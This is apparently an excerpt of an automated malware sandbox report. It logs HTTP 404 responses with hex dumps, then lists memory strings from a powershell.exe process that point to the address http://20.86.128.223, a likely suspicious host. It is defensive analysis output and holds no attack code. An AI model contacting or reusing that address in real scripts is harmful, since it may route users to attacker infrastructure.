          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:03 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:06 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:08 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:11 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:46 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-23T18:21:51.8920515Z
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:49 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-05-23T18:21:51.8920515Z
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:51 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-23T18:21:56.9522586Z
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:54 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-23T18:21:59.4967144Z
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:22 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:25 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:27 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:30 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:36 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:38 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:41 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:43 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569server-timing: processing;dur=13content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7efsWEkAW5KN724jM4PIt5%2BPnHVXim8zh3om1wxAFVlData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: 0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572server-timing: processing;dur=10content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BrzTHDOdGwhQJAbFqQqq3IqRQX0H7ZbPYp32%2Fc%2FNM5Data Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574server-timing: processing;dur=12content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zAkIpE2UUB1d%2BxlWY3heRgo6geK3PUv9hj7N%2FelFFXData Raw: Data Ascii:
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.8
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.1
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.12
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.2
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.22
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443968216.0000021E656CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223
